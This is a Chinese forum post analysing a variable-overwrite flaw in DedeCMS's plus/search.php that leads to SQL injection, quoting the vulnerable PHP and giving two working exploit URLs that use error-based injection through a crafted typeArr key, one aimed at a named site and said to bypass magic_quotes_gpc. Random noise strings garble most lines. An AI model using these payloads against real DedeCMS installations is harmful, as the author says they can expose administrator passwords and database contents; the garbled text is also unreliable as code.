微博上看到就分析了一下,这个漏洞不止一处地方可以被利用.其实可以无视magic_quotes_gpc = On的时候.真心不鸡肋. d: i& ]+ j; G- f
作者: c4rp3nt3r@0x50sec.org
3 O! Y& U( b: A: p6 fDedecms最新版 plus/search.php 文件存在变量覆盖漏洞,成功利用该漏洞可以获取管理员密码.: x/ J: v/ ?/ \" `
* _- Y' O$ K( b, \( w2 Y2 L( `黑哥说漏洞已补.怪我没有测试好.也没用这个黑站…不过这个漏洞真心不错,应该有一定利用价值.标题就不改了,补了就公开了吧.8 V& h* t4 d0 Z4 ~2 G' O* F
% W7 X% k5 {! B4 Y; E- K
============) B. _$ I1 D3 o5 t- m1 M. O+ T
& n( _3 w* s1 t1 e
& G3 {+ Y* r. P( z0 x
Dedecms最新版 plus/search.php 文件存在变量覆盖漏洞,成功利用该漏洞可以获取管理员密码." r5 P6 y* J l" A, c
0 G/ E8 g7 p2 Irequire_once(dirname(__FILE__).”/../include/common.inc.php”);
! }) B. ], W. erequire_once(DEDEINC.”/arc.searchview.class.php”);# K3 Z- q( }: B
& e. L% _ ^% a$ l" P- z( P
$pagesize = (isset($pagesize) && is_numeric($pagesize)) ? $pagesize : 10;
& a1 L. @8 n0 q4 E$typeid = (isset($typeid) && is_numeric($typeid)) ? $typeid : 0; f$ k) ]8 B6 z; }. |0 }
$channeltype = (isset($channeltype) && is_numeric($channeltype)) ? $channeltype : 0;+ Q: g, ^1 z U8 _& H2 g
$kwtype = (isset($kwtype) && is_numeric($kwtype)) ? $kwtype : 1;
1 J# S4 p k* h$ `* ~7 A: M$mid = (isset($mid) && is_numeric($mid)) ? $mid : 0; w' h3 t2 n9 I- U) e
& s3 s2 ]3 p. }
if(!isset($orderby)) $orderby=”;6 I; H$ s+ E- K) n
else $orderby = preg_replace(“#[^a-z]#i”, ”, $orderby);
! H& d* Q: ]. x! O6 T9 H * o9 l3 Z0 q5 S' S9 s# u
) Q( [. |1 ~9 k. V
if(!isset($searchtype)) $searchtype = ‘titlekeyword’;( x6 a$ @( L; P7 L. _: A8 _; j7 U, z
else $searchtype = preg_replace(“#[^a-z]#i”, ”, $searchtype);
& [0 l6 ^9 G j1 ^
/ p# N% h5 ]! h4 jif(!isset($keyword)){& _; k! x8 Z1 L- k8 D
if(!isset($q)) $q = ”;0 @3 v! X5 T& W n3 J' k" a8 ~
$keyword=$q;
7 ]. H' G6 j; _' U- w}, h2 x, R+ K2 U+ e! D* ^6 j
( G( w0 Y/ `; Y$oldkeyword = $keyword = FilterSearch(stripslashes($keyword));
* x1 B9 x. D2 ?: G
7 R j1 _/ g7 e; G8 f//查找栏目信息
* J* ^" B M1 `9 L; b$ A( pif(empty($typeid))
6 W9 A% X$ u3 O& L f{6 @7 K2 v, Y d, G7 \
$typenameCacheFile = DEDEDATA.’/cache/typename.inc’;+ B1 F& `% Y5 M+ L# v5 T1 j
if(!file_exists($typenameCacheFile) || filemtime($typenameCacheFile) < time()-(3600*24) )9 E, O; V3 L, q& x) n
{
9 Y1 C: C) _3 f. q+ ~ $fp = fopen(DEDEDATA.’/cache/typename.inc’, ‘w’);- y) L$ L1 m2 ]
fwrite($fp, “<”.”?php\r\n”);; @9 V& r0 X, i T7 q& T% I) I
$dsql->SetQuery(“Select id,typename,channeltype From `#@__arctype`”);
2 D7 i+ n( p7 O0 Y" h $dsql->Execute();
) E* R" S' ?( e/ O while($row = $dsql->GetArray())
- t) B+ w2 [. S& W5 n; |0 y: v5 ?6 F {
" {7 u- }/ _. G7 O fwrite($fp, “\$typeArr[{$row['id']}] = ‘{$row['typename']}’;\r\n”);
5 ~% G# M( P7 a7 Z8 ?: r }4 g4 t& ^8 W8 N
fwrite($fp, ‘?’.'>’);
! c3 V' ^ E. u% F' h fclose($fp);
2 q' N+ K: m& Z( W8 i6 b* B }, e5 y! ?4 l7 j' C
//引入栏目缓存并看关键字是否有相关栏目内容/ [+ L. d9 Q& F( J9 j
require_once($typenameCacheFile);" T& d0 Q' }' T' X" [6 _! K9 u+ P% ?
//$typeArr这个数组是包含生成的临时文件 里面定义的,由于dedecms的全局变量机制,我们可以自己定义一个
e6 E- j9 i, v+ l/ z: K- o//
: N" O/ y: A7 o S6 R, n if(isset($typeArr) && is_array($typeArr))
& m/ P( m- c) a* n1 Y) T3 A {- a M( _! k8 B# v( l
foreach($typeArr as $id=>$typename)
5 h0 E0 k- T2 g+ a. W% u {
$ j2 X* D( o$ f6 C0 ^ u 1 J! i1 w1 o5 ]2 U
<font color=”Red”>$keywordn = str_replace($typename, ‘ ‘, $keyword);</font> //这个地方要绕过
0 l$ O5 f. g. _# h6 s4 y0 H if($keyword != $keywordn)
3 C% ] o9 F2 k, ]6 e- ` {
. H! w; B' u" O' d0 x( } $keyword = $keywordn;" G: E: m9 H4 ~9 u3 J
<font color=”Red”>$typeid = $id; </font>// 这里存在变量覆盖漏洞使 $typeid = (isset($typeid) && is_numeric($typeid)) ? $typeid : 0; 这句过滤成了摆设5 L. D1 |$ l9 r
break;
& R. ~% Q6 |. C }% k6 j% m; r/ X/ F5 p" F
}
% u* X, @! u& z' l) G }
, y$ s; Q( l) y}
$ `: [% N0 \, w5 Z/ z- P然后plus/search.php文件下面定义了一个 Search类的对象 .% n" C7 t# g8 l5 b. g
在arc.searchview.class.php 文件的SearchView类的构造函数 声明了一个TypeLink类.; H$ o. T; l$ C. \# Z
$this->TypeLink = new TypeLink($typeid);, [7 A) ^6 I) R) j6 p% E$ C' ?
5 t+ B) v% e4 b, J, |5 q
TypeLink类的构造函数没有经过过滤,(程序员以为前面已经过滤过了… )直接带入了sql语句.- U$ J" T) @, [6 C n! }
; w% l" L: `0 e
class TypeLink' e! ?* B' |, W0 K9 t- B% j" H, C
{; ?1 J6 s9 x8 G3 I9 j d9 E y
var $typeDir;
; s8 T1 {/ g4 l$ c. f( S var $dsql;4 \0 Q( t0 Q# N2 D5 ^4 {4 K
var $TypeID;$ L2 _* k7 |0 M. ^+ }3 f7 B
var $baseDir;: v- n0 M0 x2 r: l4 X
var $modDir;5 e! H# X7 Z, v% w0 x$ [3 D
var $indexUrl;7 b2 y3 \, f! j2 i
var $indexName;2 z, n# Y+ v- r2 x6 r* @
var $TypeInfos;
; K( s+ w# z9 f0 P5 j V var $SplitSymbol;( ^* F& v+ t% q6 L2 \- S3 f# @0 x
var $valuePosition;
' D+ E& s' C+ h4 _. E+ H" Q; S var $valuePositionName;0 `! o5 z) S! g, K2 T* D7 z" J: D- d, H6 v
var $OptionArrayList;//构造函数///////
1 R, |$ Q* J' ?# Q% [' b y //php5构造函数
3 D. |* |$ d' }1 m# u0 P function __construct($typeid), Y7 F/ C! y+ w% x& l+ `3 I( \2 W* k+ H
{
) z1 C" B/ O1 D- m$ t) [ $this->indexUrl = $GLOBALS['cfg_basehost'].$GLOBALS['cfg_indexurl'];
/ T; l& x6 i" s- u% {% i1 B3 C $this->indexName = $GLOBALS['cfg_indexname'];
' L. W: P4 }9 k6 S8 ~8 ` $this->baseDir = $GLOBALS['cfg_basedir'];
0 j* b! R1 F) n4 j2 @, m; O9 _ $this->modDir = $GLOBALS['cfg_templets_dir'];
% N* n1 |2 ~5 D9 R" @ $this->SplitSymbol = $GLOBALS['cfg_list_symbol'];
( |; M. ?* n/ T" M Z $this->dsql = $GLOBALS['dsql'];
# @- G( \; |# Y4 m2 [ $this->TypeID = $typeid;
7 a7 m4 F: X2 o( V4 T: b3 t, b* E $this->valuePosition = ”;: f1 X6 F* U* Z
$this->valuePositionName = ”;
& k5 E7 c: n, F5 y7 C7 p $this->typeDir = ”;1 I+ l8 k9 _5 a3 j& M
$this->OptionArrayList = ”;% n$ k2 h) ~4 Y3 h# a
% s: N( p5 x7 f1 a/ ~, n1 @9 k
//载入类目信息7 V7 n5 y4 y, @
2 L& h. E [. |1 E- B ^ <font color=”Red”>$query = “SELECT tp.*,ch.typename as
8 w4 A. Z* P: Uctypename,ch.addtable,ch.issystem FROM `#@__arctype` tp left join
0 g8 H/ N: u* G5 ~. I4 v; N`#@__channeltype` ch+ U6 n+ _+ g/ w
on ch.id=tp.channeltype WHERE tp.id=’$typeid’ “;</font> //注射漏洞发生在这里,很明显需要magic_quotes_gpc = Off 鸡肋了吗?好可以吧至少不需要会员中心阿: s% f# V" h7 M1 |4 |! ^4 Z9 X# U
7 B/ I& A H9 D; \ if($typeid > 0)! q. W" }0 Z! `6 y5 N4 X6 j6 A
{' C" g Y. i9 ^, n( _1 l- X
$this->TypeInfos = $this->dsql->GetOne($query);
6 L/ d5 s6 g* T, C8 c, x利用代码一 需要 即使magic_quotes_gpc = Off) W4 l9 a5 I; _5 O4 e1 G. ?
0 B; {+ x$ C- rwww.political-security.com/plus/search.php?typeArr[2%27%20and%20@%60\%27%60%3D0and%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20%27]=c4&kwtype=0&q=c4rp3nt3r&searchtype=title
* e( u9 h0 v4 J$ n W$ _ 4 w! O) Q) A( \/ o4 l
这只是其中一个利用代码… Search 类的构造函数再往下
8 i. H8 [# u; m8 K- i 3 \9 N1 M% ?! I. W Z! {& e6 J
……省略+ S" y u/ _& C4 X+ R# q- p
$this->TypeID = $typeid;
0 {; F3 {; F/ \0 j1 U) f9 Y3 B6 `9 q……省略$ x B# \, g+ T! T* x0 G' f4 x
if($this->TypeID==”0″){" W0 F1 Y2 p. ^# t3 Y/ U
$this->ChannelTypeid=1;
- K9 b1 P% H. z, J1 ^- @4 z2 h) N }else{
# u+ H0 ^' b X8 P2 D. m$ l+ d $row =$this->dsql->GetOne(“SELECT channeltype FROM `#@__arctype` WHERE id={$this->TypeID}”); //这里的注入漏洞无视magic_quotes_gpc = On的存在哦亲
* e; r" n( k2 z//现在不鸡肋了吧亲…
2 \4 A# L3 R9 L0 k $this->ChannelTypeid=$row['channeltype'];; s! U4 ~6 k* I) v9 P
4 [( p8 P# K/ T' N8 ~9 s! e
}9 a- R3 W% q# d; _1 q7 G# W! t3 w- |- h
利用代码二,下面这个EXP 即使magic_quotes_gpc = On 也可以成功利用.
* u% v- ~9 A: r6 a 1 q* |' L7 A6 Q/ S
www.political-security.com /plus/search.php?typeArr[1%20or%20@%60%27%60%3D1%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20@%60%27%60%3D0]=11&&kwtype=0&q=1111&searchtype=title
' Z4 Q9 K0 L' t0 l3 T
; Y) {: r2 ?6 J/ ~9 [1 J如果那个数据库里存在内容,就要考虑的复杂点了.我也没考虑那么周全,分析了下然后简单测试了下,也没用来黑站
- D! J: s/ B+ t' Y. G; r |
发表于 2013-1-19 08:18:56
收藏
支持
反对